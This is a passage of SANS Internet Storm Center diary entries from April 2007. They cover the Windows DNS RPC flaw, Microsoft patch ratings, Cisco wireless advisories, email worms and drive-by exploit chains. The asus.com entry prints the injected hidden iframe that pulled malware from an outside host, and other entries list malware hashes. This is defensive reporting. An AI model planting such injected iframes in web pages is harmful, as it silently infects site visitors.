Webwasher-Gtwy 6.0.1 04.14.2007 Win32.Malware.gen (suspicious)
Aditional Information
File size: 48640 bytes
MD5: 488b22114f1a08dc68a7e2cc34bf1d01
SHA1: 3da87252c917493e591c6ea222637910fff07a5e
There was some discussion a few hours ago in the TeamSpeak forums, but currently the forums appear to be offline.  We'll keep monitoring this and will post any updates if needed.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-04-13

More info on the Windows DNS RPC interface vulnerability

Some more information for the community regarding the Windows DNS RPC vulnerability that we have been reporting on http://isc.sans.org/diary.html?storyid=2627. We have knowledge of a successful attack that occurred on April 4, 2007. This appears to be an opportunistic attack (instead of a targeted attack).

So it's likely that others have been compromised as well. If you have a vulnerable MS DNS server (Wik2K SP4 or Win2003 SP1 or SP2) accessible to the Internet and don't have ports above 1024 blocked, then you may have already been targeted in an attack.

At this point, there seems to be a very small number of known compromises. We are interested if other sites have seen it? Has your IDS been alerting on shellcode for DCOM signatures and the port is above 1024? Have you seen portscans above 1024? Has your DNS.exe service died recently? (Apparently the service does not restart by itself.) If so, then let us know. And as always, if you have any packet captures of this activity please send them in.

Update: If you have a large number of domain controllers and want to automate the disabling of RPC, check out this blog entry: http://msinfluentials.com/blogs/jesper/archive/2007/04/13/turn-off-rpc-management-of-dns-on-all-dcs.aspx


Published: 2007-04-13

Microsoft Vulnerability in RPC on Windows DNS Server

As a follow up to our diary earlier this week about a potential new DNS Vulnerability,  Microsoft has released an advisory in regard to the vulnerability.  Microsoft has investigated and it appears a vulnerability exists that could allow an attacker to run code under the Domain Name System Server service.  This service by default runs as the local SYSTEM id. 

Microsoft has a few suggested actions that can mitigate the risk.

  1. Disable remote management over RPC for the DNS server via a registry key setting.
  2. Block unsolicited inbound traffic on ports 1024-5000 using  IPsec or other firewall.
  3. Enable the advanced TCP/IP Filtering options on the appropriate interfaces of the server.

For more information, please see  KB 935964 (Vulnerability in RPC on WIndows DNS Server Could Allow Remote Code Execution).

Scott Fendley
ISC Handler


Published: 2007-04-12

Svchost, Microsoft Updates, and 99% CPU Usage

We received a couple emails today talking about the latest Microsoft Updates and the svchost service taking up 99% of CPU Utilization after applying them.

Is this isolated to a couple people, or is this more widespread?  Then, if it is widespread, and you fixed it, how did you do it?  Share your insight!

(Thank you Noah, and other readers who wished not to be named for your submission!)

(Not being a Microsoft guy myself....)

Joel Esler
Handler o' the Day


Published: 2007-04-12

Cisco wireless equipment vulnerabilities

Cisco released an advisory regarding three weaknesses in the Cisco Wireless Control System. This is Cisco’s central platform for the management of their WLAN equipment.

  • WCS apparently uses fixed and unchangeable authentication credentials on the FTP service used by the Wireless Location Appliances for backup purposes. Fixed in WCS This is regular FTP, so these passwords can be sniffed off the network and re-used by an attacker.
  • WCS suffers from a privilege escalation vulnerability that allows valid users to access information from any WCS configuration page (fixed in or to become a member of the SuperUsers group (fixed in
  • Certain WCS directories are not password protected. This may lead to disclosure of private information such as access point location. Fixed in
They also released a second advisory on vulnerabilities in the Cisco Wireless LAN controller and their Lightweight Access Points. A number of fixed versions are pending release, so check the advisory for up-to-date information.

Applicable to the WLC are:
  • Use of default community strings (public/private);
  • The device may be crashed by sending malformed ethernet traffic;
  • Some or all of the Network Processing Units within the WLC may be locked up by sending malformed traffic, including some SNAP packets, malformed 802.11 traffic or packets with unexpected length values in headers;
  • WLAN ACLs could in some cases not survive a reboot.

The Cisco Aironet 1000 and 1500 lightweight access points are reported to contain a hard-coded service password. This is only available over a physical console connection, though.

Maarten Van Horenbeeck


Published: 2007-04-12

EXE/ZIP e-mail viruses (editorial)

A quick (technical) update to this otherwise more "philosophical" diary: Its not that hard to figure out if the content of an encrypted ZIP file is a .exe file. The file names are not encrypted! So just run:
$unzip -l patch-58214.zip 
Archive: patch-58214.zip
Length Date Time Name
-------- ---- ---- ----
40649 04-12-07 18:21 patch-58214.exe
-------- -------
40649 1 file

anyway back to the editorial ;-)...

I label this diary "Editorial", as I would like to go beyond the plain facts of the resent set of "Storm"/"nuwar"/"zhelatin" viruses.

Remember Bagel? It was just a couple years ago when a very similar set of viruses was making the round. Bagel arrived as a plain .exe, waiting for a gullible user to double click and execute it. It later, very much like the new "Storm" virus, used an encrypted ZIP file.

Back with Bagel, we managed to get a hold of some of the web logs from sites Bagel used to "call home". In analyzing these logs we found a large overlap in users infected by various Bagel variants. In short: The same users are getting infected over and over again by the "malware of the day".

I think these viruses offer a sad glimpse into the current state of Internet security. Not only have users still not learned to "never click on an executable". Neither have network administrators learned to filter executables. When was the last time you received a legitimate executable as an attachment? (NO! IE7.exe was not one of them!).

Lastly, "Storm" is yet another hint that current AV software is no longer an adequate means to protect yourself from current and relevant threats. Subscription based business models direct mainstream consumer anti-virus systems into a dead end of signature updates, which haven't work at least since Zotob showed up.

As a reader of this post, you are unlikely to be able to do anything about the current sad state of anti-virus. But you may be able to block .exe files on your mail server. Don't ask me for subject or file names. Block executables!


Published: 2007-04-12

whois.internic.net outage?

We are also receiving reports from users (and other handlers), not being able to reach whois.internic.net.  One of our handlers tells us that a traceroute to the host expires in the DC area in alter.net.

Joel Esler
Handler on Duty


Published: 2007-04-12

New Worm making the rounds?

We've received a bunch of emails in the past few minutes indicating the possible presence of a new Worm.

Apparently it indicates itself as a "Patch" for the "New worm" that is going around (whatever that may be, there are just so many I could choose from!)

The Subject of the email (that we have seen so far) says "Worm Alert!".

It has two attachments, one being an image with "panic-worded text", andt he other is a password protected zip file, whose password is revealed in the image.

Clamav will not pick up the zip file, but it will pick up the .exe inside of it, and apparently names it "Trojan.Small-1641"  (That's so descriptive!)

Joel Esler
Handler of the Day


Published: 2007-04-12

Oracle Critical Patch Update Pre-Release Announcement

This was also a notification from one of our readers (thanks Juha-Matti!), as well as all the email blasts we received this morning from the big Oracle in the sky.  Oracle has released their announcements for April.


"This Critical Patch Update contains 37 security fixes across all products."

So, if you are running Oracle, it's that time of the month again!

Joel Esler
Handler of the Day


Published: 2007-04-12

Opera 9.20

Thanks to a couple readers that wrote in this morning, we were notified about Opera 9.20 for all platforms.

A cut and paste of the "Security" section says:


  • Fix for character encoding inheritance issue with frames, which could enable cross-site scripting. See the advisory.
  • Fixed an issue regarding handling of FTP PASV response, as reported by Mark at bindshell.net
  • XMLHttpRequest now treats separate ports on the same server as a different server. Issue reported by Egmont Koblinger.
  • Fixed an issue where scripts could continue to run after leaving the page, as reported by Herrmann Manuel.
  • Skandiabanken.no's message about successful certificate installation is now shown.
So, if you are out there running Opera.  Time to upgrade!  /me goes off to upgrade my own.

Joel Esler
Handler of the Day


Published: 2007-04-10


AOL's IM clients are getting attention from the security researchers: following ".." while deposing a file and/or not displaying the same filename as the actually used filename.
  • ICQ: should have updated itself by now, if not, make sure it did.
  • AIM: make sure to upgrade to the latest greatest
Several readers reported that Sun Java 6 update 1 is being released through automatic updates.

Swa Frantzen -- NET2S


Published: 2007-04-10

Microsoft black Tuesday patches - April 2007

Overview of the April 2007 Microsoft patches and their status.

Note there was an out of cycle patch for the ANI vulnerability that we reported on earlier and that same patch is included here once again for completeness.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers

out of cycle
Multiple vulnerabilities, leading to privilege escalation, DoS and remote code execution.
Replaces MS06-001 and MS05-053 and MS05-002 on windows 2003
Windows GDI.

KB 925902

Realtek HD audio control panel
Actively exploited

SA 935423
Critical PATCH NOW Important
MS07-018 Remote code execution and XSS scripting
MCMS (Microsoft Content Management Server)

KB 925939
No known exploits Critical Important Critical
MS07-019 Memory corruption leading to remote code execution
UPnP (Universal Plug and Play)

KB 931261
PoC available in for pay program
Critical Critical Critical(**)
MS07-020 URL parsing error leads to remote code execution
Microsoft Agent

KB 932168
No known exploits Critical Critical Important
MS07-021 Mulitple vulnerabilities leading to remote Code execution, privilege escalation and DoS
CSRSS (Windows Client/Server Run-time Subsystem)

KB 930178
Known exploits since Dec 15th, 2006.

MSRC blog
Critical PATCH NOW Critical
MS07-022 Buffer overflow leading to privilege escalation
Windows Kernel

KB 931784
Details discussed publicly
Important Important Important

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
(**)Further clarification from the more generic text above: Windows XP is used in a server role (like it or not), just as Windows 2003 server is used on laptops. The difference between client and server is not how the OS is marketed, not even what it is best suited for, but how its users are using it.

Swa Frantzen -- NET2S


Published: 2007-04-10

Pump and Dump reporting

Pump and Dump spams are part of a financial fraud scheme. . Aside of the usual spam reporting one can also report the practice to the appropriate official contacts.

Due to the global nature of this spam one needs to have a list of which address to report to.

  • SEC wants your stock related spam
  • Forward the spam to enforcement(AT)sec.gov
  • You get a standardized reply for every report, typically during the next business day
Germany: Bafin
  • poststelle-ffm(AT)bafin.de
Australia: ASIC (oversight) and ASX (stock exchange)
  • ASIC has a form, way too impractical for dealing with individual spam messages
  • info(AT)asx.com.au

If you have confirmed and working responsive addresses for other stock exchanges, please let us know.


Thanks to our readers Axel and more for reporting in on this.
Swa Frantzen -- NET2S


Published: 2007-04-09

Spam volume by category and year

    Over the last few years I've done volunteer spam analysis for a number of groups.   As part of that work I've put together a report on individual spam categories at http://www.stearns.org/spamreport/spamreport.html .  It deliberately avoids conclusions, but provides the raw data for you to draw your own.  For example, the summary line near the end might answer the question, "Has the CAN-SPAM act - which went into effect January 1st, 2004 - measurably reduced the amount of spam we see in our inboxes?"
    -- William Stearns


Published: 2007-04-08

movie.exe spammed

If you're still not blocking EXEs on your email gateway, chances are your users are getting flooded by the latest scam at the moment. We're receiving reports of a "movie.exe" 95c563731b7828d6e98eae81ee08869f making the rounds, attached to emails with very "clickable" subject lines like "USA Just Have Started World War III" / "Missle Strike: The USA kills more then 20000 Iranian citizens" / "Israel Just Have Started World War III".  You get the drift - the kind of friendly headlines you would expect to get on a peaceful Easter sunday.   AV coverage is nonexistent at this time, so be careful.
Thanks to Mike for submitting the first sample of this critter!


Published: 2007-04-08

Not so funny.php

With all the malware and exploit files around, I find it frequently hard to remember some specific attack. But when today while analyzing a suspicious site I came across an exploit which tried to download a binary called "funny.php", it sure felt enough like a glitch in the matrix to make me look back through my logs. And indeed, there's been another funny.php, from the same server in Malaysia, almost a month ago. And another, five days ago from a server in Germany. The EXEs the exploit tries to retrieve varies (of course) but the exploit pattern is always the same.

The first file, commonly included per IFRAME, contains a file part named "in.php?adv=1". This file contains an encoded blob of JavaScript, which is not reliably detected by AV (from the scanners I have at hand to verify, only Kaspersky, FSecure and McAfee seem to recognize it at all). Once manually decoded, AV detection improves somewhat, but is still leaky. The decoded blob reveals a bunch of "friendly" little code snippets:

1. Exploit-Byteverify (a quite wizened Java exploit)
2. An Exploit for MS06-014, with the code lifted almost in verbatim off the corresponding Metasploit Module
3. A copy of the MS06-057 WebViewFolderIcon.SetSlice exploit, artfully rendered to avoid detection

If either of these is successful, the exploit downloads and runs the mentioned "funny.php?adv=1" files, which invariably turn out to be Trojan Downloaders or worse. The funny.php thingies are apparently refreshed frequently enough to keep AV coverage low to nonexistent.

While the three exploits are not at all lethal on a well patched PC, the prevalence and endurance of these not-so-funny PHPs suggests that there are still far too many PCs out there that fall for this sort of attack. We have informed the two affected ISPs in Germany and Malaysia, lets see who has staff on duty on an Easter weekend...


Published: 2007-04-07

New MS DNS Vulnerability creeping up?

We are currently investigating a possible exploit with MS, Active Directory, and DNS.  At this point the information looks solid, provided initially by Bill O. for review.  Further information has been provided by Bill, who is working on contacting MS, as things have progressed.  Looking at the description of the attack method, it looks solid based on my experience with MS.  If anybody has any scans from the 61.63.xxx.xxx range, I would be very interested in seeing full captures.

We will keep you posted as things progress.  I will be sending on what we have discovered as well to MS tomorrow.  It is 0130EST right now in the US, I will be passing the findings on to the other Handlers for review and input later this morning.


Published: 2007-04-06

asus.com exploited

In the past days a handful of readers had sent us notes that asus.com was compromised. We unfortunately could not find anything wrong in the html at all.

Today the kaspersky blog had an entry about a ANI exploit loaded via an iframe at asus.com.

So we fetch a new copy, still nothing to be seen. Until Johannes suggested asus.com might be load balanced, and yes indeed it seems it is using DNS load balancing:

$ dig asus.com a

; <<>> DiG 9.2.3 <<>> asus.com a
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19075
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0

;asus.com. IN A

asus.com. 14400 IN A
asus.com. 14400 IN A

asus.com. 14400 IN NS dns3.asus.com.
asus.com. 14400 IN NS dns7.asus.com.

;; Query time: 18 msec
;; WHEN: Fri Apr 6 23:33:01 2007
;; MSG SIZE rcvd: 96

Fetching a copy of the home page of both servers, and comparing the resulting page yields:

(line breaks added to make page easier to read)

$ diff index.html index.html.1 
</table><iframe src=http://[DELETED].com/app/helptop.do?id=ad003
width=100 height=0></iframe>

Just goes to learn that a load balanced site is a pain to investigate if only some of the servers are affected.

The script at the time we looked at it was obfuscated and leads to a VBscript, that's up to no good pointing to another obfuscated javascript and a executable cloaked as a jpg file.

That file gives following over at virustotal:

Antivirus Version Update Result
AhnLab-V3 2007.4.7.0 20070406 -
AntiVir 20070406 TR/Drop.Ag.344576.B
Authentium 4.93.8 20070406 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 20070406 Win32:Tibs-ADO
AVG 20070405 -
BitDefender 7.2 20070406 -
CAT-QuickHeal 9.00 20070406 (Suspicious) - DNAScan
ClamAV devel-20070312 20070406 -
DrWeb 4.33 20070406 -
eSafe 20070406 suspicious Trojan/Worm
eTrust-Vet 30.7.3546 20070406 Win32/NSAnti
Ewido 4.0 20070406 -
F-Prot 20070404 W32/PWStealer.gen1
F-Secure 6.70.13030.0 20070406 -
FileAdvisor 1 20070407 -
Fortinet 20070406 suspicious
Ikarus T3.1.1.3 20070406 MalwareScope.Worm.Viking.3
Kaspersky 20070406 Trojan-PSW.Win32.OnLineGames.kw
McAfee 5003 20070406 New Malware.bc
Microsoft 1.2405 20070406 -
NOD32v2 2171 20070406 -
Norman 5.80.02 20070405 -
Panda 20070406 Suspicious file
Prevx1 V2 20070407 -
Sophos 4.16.0 20070406 Mal/EncPk-F
Sunbelt 2.2.907.0 20070403 -
Symantec 10 20070406 -
TheHacker 20070404 -
VBA32 3.11.3 20070406 Trojan-PSW.Win32.Nilage.ara
VirusBuster 4.3.7:9 20070406 -
Webwasher-Gateway 6.0.1 20070406 Trojan.Drop.Ag.344576.B

Name next3.png
Size 100539
md5 42a248b8634da52d6044f87db9a8d794
sha1 cf612836be3c763ab9dc2c9afc0ccc112f2c2a04
Date scanned 04/07/2007 00:09:16 (CET)

Password stealer it seems, same old goal.

I've not seen an ANI exploit in there right now, but we can be easily looking at something that's dynamic in some other way as well.

Swa Frantzen -- NET2S



Published: 2007-04-05

iPod Linux virus PoC

Symantec and Viruslist.com have write-ups on a new virus that infects iPods running Linux. According to Symantec infects anything in the /usr/lib with "mod.so" in the filename. It also displays a simple message letting you know you are infected (a nice screen shot of this on the Viruslist page). Kinda novel. :)




Published: 2007-04-05

Microsoft April Security Bulletin Advance Notification

It is almost that day and in anticipation of patch Tuesday, Microsoft has published their day's menu for us.
We've got four new bulletins coming out with a top severity of Critical and a requirement for rebooting.

Of note is the news that they will also be releasing a number of high priority non-security updates as well though no further information is available till next week.



Published: 2007-04-04

Is WEP dead yet? Should it be?

We've known almost from its release, that there were some significant weaknesses in WEP (Wired Equivalent Privacy).  AirSnort and WEPcrack among other packages have been able to crack WEP keys fairly easily if they could sniff enough of the encrypted traffic.  One of our readers (thanx, Mike) noted a new paper by three folks from the Darmstadt Technical University in Germany entitled Breaking 104 bit WEP in less than 60 seconds.  They explain how an updated attack on the underlying RC4 algorithm allows much faster cracking of WEP (over an order of magnitude faster), than previously realized.  We have long recommended that WEP be abandoned in favor of WPA (or, even better, WPA2).  This new work demonstrates that WEP is little more than an annoyance to folks really interested in seeing your traffic.


Published: 2007-04-04

Various Vista Concerns

I ran across a couple of stories in the last day or two that got me thinking about how much of security relies on assumptions that aren't necessarily always validated (remember Ronald Reagan's old adage "Trust, but verify"?).  The first one is this story from Blackhat Amsterdam about VBootkit.  The key quote from the story is "Experts say that the fundamental problem that this highlights is that every stage in Vista's booting process works on blind faith that everything prior to it ran cleanly."  The other one was this story from one of the guys at CERIAS at Purdue about the introduction of symbolic links in Vista.  Frankly, I haven't paid enough attention to Vista yet, to realize they had added symbolic links and I don't program for Windows, but having been a programmer in a previous life, the possible implications of this one jumped out at me.  Further, I suspect that, all too soon, we'll be seeing all the race conditions with symlinks in Vista that we've seen in Unix/Linux over the years.  The more things change, the more things stay the same, huh?!


Published: 2007-04-04

telnetd deja vu, this time it is Kerberos 5 telnetd

It seems like it was just a couple of weeks ago that we noted issues with the Solaris telnetd.  A couple of our readers took exception to our statement in the earlier story that telnet shouldn't be open to the internet.  Some of them pointed out that Kerberized telnetd uses much stronger authentication and can optionally encrypt traffic.  That is all well and good, but I don't consider that ordinary telnet(d).  Today, I noticed a RedHat bulletin (and subsequently, the official MIT advisory) about a vulnerability in Kerberos 5 telnetd (so it isn't any safer from bugs creeping into the code) that could allow unauthenticated root login by passing a crafted username (a different bug than the Solaris one).   Note that in neither case is the issue with the client, the issue is on the server side.  There are still valid reasons to have the telnet client on machines.  Anyway, krb5-telnet is not enabled by default on RedHat (or any other Linux/Unix that I'm aware of), but if you use it, update as soon as possible/practical.  I assume that other Linux distributions will have updates soon, if not already available.  If you are building from source, please see the MIT advisory.

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0956 (not live yet)


Published: 2007-04-04

Microsoft Patch Maybe Causing Some Problems

We have received several emails today from people who are having problems with the patch.  One that is confirmed by Microsoft is the Realtek problem.  Microsoft has been working on this problem and have provided a patch for the problem at:


Other possible issues have been reported and are being investigated.  Microsoft is asking anyone having problems after installing the patch to contact them at Microsoft Product Support Services at 1-866-PCSAFETY.  There is no charge for the support relating to Microsoft Security Updates.



Published: 2007-04-03

* Microsoft out of cycle patch

Overview of the out of cycle patch.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS07-017 Multiple graphical format vulnerabilities. Replaces MS06-001 and MS05-053 and MS05-002 on windows 2003
Windows all versions

No known problems

SA 935423
KB 925902
Actively exploited
Critical PATCH NOW Important

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Swa Frantzen -- NET2S


Published: 2007-04-02

Week of Vista bugs is a hoax

Month (or weeks/days/...) of bugs: We try to give them as little publicity as possible in order to discourage the behavior and encourage a bit more responsibility than to disclose vulnerability details in a blog.

Now with April 1st just behind us we were ready for a good laugh with people falling for a hoax or two, but once it's April 2nd, you expect people to resume normal behavior.

Still the first installment of the week of Vista bugs seemed bad on reading it diagonally, but just unfounded and hard to believe at all upon closer inspection.

A friendly contact gave us this link:
Where the perps expose their own hoax.

Just don't believe everything you read on the Internet ... not even on April 2nd and the days after it.

And forget the Week of Vista bugs unless you urgently need a laugh.
Swa Frantzen -- NET2S


Published: 2007-04-02

and in other news

ANI has been keeping us busy over the last few days, but it hasn't been the only thing that has been going on.  So here is a mini update.
  • ie7.0.exe - This started appearing about the same time as the ANI exploits, mainly on web sites, but currently it is being distributed as SPAM messages.  Typically an image SPAM message which links to a web page with the exploit.  We've seen two names ie7.0.exe and DirectX-10.exe.  Detection rates are improving and most AV products should catch this one.  Once infected the compromised host will start to SPAM (but since we are all blocking executables, especially in emails this shouldn't be much of a problem).
  • PHP scanning - We've had a few reports of PHP scanning coming out of Hong Kong (based on the source addresses).  It seems to be fairly generic as it is hitting sites that do not have HP as well as PHP sites.
  • DST Part 2 - The original Daylight Savings Time start passed on the weekend.  So far the only reports we've had were:
    • Church Bells ringing at the wrong time
    • A web site providing TV guides was out by an hour causing some initial confusion for one user at least
  • April Fools - ISC did not participate in light of the ANI issue (disappointing several handlers who were all geared up to go) , but there were plenty of others who did.  We received a number of emails that got a "check the date" reply.
Mark H


Published: 2007-04-02

*Microsoft to Release Out-of-Schedule Patch for ANI Vulnerability

I don't think this is an April Fools' Hoax. 

The Microsoft Security Response Center blog reports that they "have been working around the clock to test this update and are currently planning to release the security update that addresses this (ANI) issue on Tuesday April 3, 2007."

This is further supported here: www.microsoft.com/technet/security/bulletin/advance.mspx